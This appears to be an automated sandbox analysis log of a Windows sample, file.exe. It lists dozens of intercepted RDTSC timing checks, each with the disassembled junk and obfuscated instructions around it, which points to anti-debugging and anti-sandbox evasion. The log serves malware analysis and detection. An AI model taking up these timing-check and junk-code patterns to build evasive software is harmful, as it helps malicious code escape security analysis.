Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D34C second address: 166D35C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9CD8E65986h 0x00000008 jo 00007F9CD8E65986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D35C second address: 166D363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D363 second address: 166D369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D369 second address: 166D385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFFh 0x00000009 popad 0x0000000a jnp 00007F9CD8F21AFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D4DC second address: 166D4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65990h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D4F0 second address: 166D507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9CD8F21AFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D507 second address: 166D529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9CD8E6598Dh 0x0000000e jns 00007F9CD8E6598Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 166D529 second address: 166D54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B09h 0x00000009 jnp 00007F9CD8F21AF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1675ACF second address: 1675AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9CD8E65986h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1675AD9 second address: 1675AE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F9CD8F21AF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1675AE8 second address: 1675AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168325D second address: 1683294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007F9CD8F21AFCh 0x00000010 jnc 00007F9CD8F21AFEh 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F9CD8F21AF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168575B second address: 1685761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1685761 second address: 1685767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1688076 second address: 168808D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F9CD8E65986h 0x0000000c jmp 00007F9CD8E6598Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168808D second address: 16880A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F9CD8F21AF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jnc 00007F9CD8F21B3Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16880A4 second address: 16880BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8E65995h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16880BD second address: 16880C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168CF7E second address: 168CF88 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9CD8E6598Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168CF88 second address: 168CF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 168CF8F second address: 168CFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F9CD8E65998h 0x00000015 jmp 00007F9CD8E6598Eh 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1699356 second address: 1699360 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9CD8F21AF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1699360 second address: 169937B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9CD8E65992h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 169937B second address: 1699380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1699380 second address: 16993AD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9CD8E65999h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F9CD8E65992h 0x00000012 jc 00007F9CD8E65986h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16993AD second address: 16993B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 169C41C second address: 169C42C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F9CD8E65986h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A265E second address: 16A2662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2912 second address: 16A2931 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9CD8E65988h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9CD8E65991h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2931 second address: 16A294C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9CD8F21AF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F9CD8F21B02h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2A8C second address: 16A2A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D68 second address: 16A2D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D6C second address: 16A2D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D70 second address: 16A2D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D76 second address: 16A2D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9CD8E65992h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A2D90 second address: 16A2D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3742 second address: 16A3746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3746 second address: 16A3761 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9CD8F21AF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 ja 00007F9CD8F21AF6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3761 second address: 16A377F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9CD8E65992h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F9CD8E65986h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A377F second address: 16A3783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A3783 second address: 16A3787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A611F second address: 16A6134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F9CD8F21AF6h 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A6134 second address: 16A6138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A6138 second address: 16A614E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B02h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A6284 second address: 16A62B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9CD8E65991h 0x0000000d jmp 00007F9CD8E6598Dh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16A62B7 second address: 16A62BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16F7259 second address: 16F7263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16F7263 second address: 16F7267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BBB81 second address: 17BBBA8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9CD8E6598Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F9CD8E6598Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD0D second address: 17BAD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD15 second address: 17BAD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD21 second address: 17BAD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAD25 second address: 17BAD33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F9CD8E6598Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAFFB second address: 17BAFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17BAFFF second address: 17BB018 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9CD8E6598Bh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1239 second address: 73E124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E124D second address: 73E125E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E125E second address: 73E126E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E126E second address: 73E12AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F9CD8E6598Fh 0x00000017 and ecx, 7FD4461Eh 0x0000001d jmp 00007F9CD8E65999h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E12AF second address: 73E12E8 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 248293E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+1Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F9CD8F21AFFh 0x00000015 call 00007F9CD8F21B08h 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E12E8 second address: 73E1357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F9CD8E6598Ch 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+1Ch], eax 0x00000011 jmp 00007F9CD8E65991h 0x00000016 mov eax, dword ptr [esi+20h] 0x00000019 jmp 00007F9CD8E6598Eh 0x0000001e mov dword ptr [edx+20h], eax 0x00000021 pushad 0x00000022 mov edx, eax 0x00000024 mov bx, ax 0x00000027 popad 0x00000028 mov eax, dword ptr [esi+24h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx ebx, cx 0x00000031 pushfd 0x00000032 jmp 00007F9CD8E6598Ah 0x00000037 jmp 00007F9CD8E65995h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1357 second address: 73E135D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E135D second address: 73E1361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1361 second address: 73E1400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e call 00007F9CD8F21B01h 0x00000013 pushfd 0x00000014 jmp 00007F9CD8F21B00h 0x00000019 xor cx, 8728h 0x0000001e jmp 00007F9CD8F21AFBh 0x00000023 popfd 0x00000024 pop esi 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+28h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F9CD8F21B05h 0x00000030 add ch, 00000046h 0x00000033 jmp 00007F9CD8F21B01h 0x00000038 popfd 0x00000039 popad 0x0000003a mov dword ptr [edx+28h], eax 0x0000003d jmp 00007F9CD8F21AFAh 0x00000042 mov ecx, dword ptr [esi+2Ch] 0x00000045 jmp 00007F9CD8F21B00h 0x0000004a mov dword ptr [edx+2Ch], ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov edx, 2CC66930h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1400 second address: 73E150A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 42E86206h 0x00000008 pushfd 0x00000009 jmp 00007F9CD8E65997h 0x0000000e and ax, C88Eh 0x00000013 jmp 00007F9CD8E65999h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ax, word ptr [esi+30h] 0x00000020 pushad 0x00000021 mov edi, ecx 0x00000023 mov ax, 5A8Fh 0x00000027 popad 0x00000028 mov word ptr [edx+30h], ax 0x0000002c jmp 00007F9CD8E65992h 0x00000031 mov ax, word ptr [esi+32h] 0x00000035 pushad 0x00000036 movzx esi, di 0x00000039 call 00007F9CD8E65993h 0x0000003e pushfd 0x0000003f jmp 00007F9CD8E65998h 0x00000044 sbb eax, 11C757C8h 0x0000004a jmp 00007F9CD8E6598Bh 0x0000004f popfd 0x00000050 pop esi 0x00000051 popad 0x00000052 mov word ptr [edx+32h], ax 0x00000056 jmp 00007F9CD8E6598Fh 0x0000005b mov eax, dword ptr [esi+34h] 0x0000005e jmp 00007F9CD8E65996h 0x00000063 mov dword ptr [edx+34h], eax 0x00000066 jmp 00007F9CD8E65990h 0x0000006b test ecx, 00000700h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F9CD8E65997h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E150A second address: 73E1548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F9D4693FCE6h 0x0000000f jmp 00007F9CD8F21AFEh 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d movsx ebx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1548 second address: 73E154E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E154E second address: 73E1552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1552 second address: 73E1556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1556 second address: 73E157B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9CD8F21B05h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E157B second address: 73E1590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1590 second address: 73E15A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E15A0 second address: 73E15A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E15A4 second address: 73E15E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c jmp 00007F9CD8F21B07h 0x00000011 pop esi 0x00000012 jmp 00007F9CD8F21B06h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410490 second address: 74104EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov dh, FFh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F9CD8E65992h 0x00000010 push eax 0x00000011 jmp 00007F9CD8E6598Bh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F9CD8E65996h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9CD8E65997h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74104EB second address: 74104F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74104F1 second address: 74104F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B9E second address: 73C0BDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F9CD8F21AFCh 0x00000010 movzx ecx, dx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F9CD8F21AFCh 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov eax, 3DB8DBFDh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380059 second address: 7380077 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9CD8E65993h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380077 second address: 738007D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 738007D second address: 7380081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380081 second address: 73800A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F9CD8F21AFBh 0x00000016 pop esi 0x00000017 mov ch, bl 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380A4A second address: 7380A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65996h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380A64 second address: 7380A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9CD8F21AFBh 0x00000012 mov bl, ch 0x00000014 popad 0x00000015 rdtsc
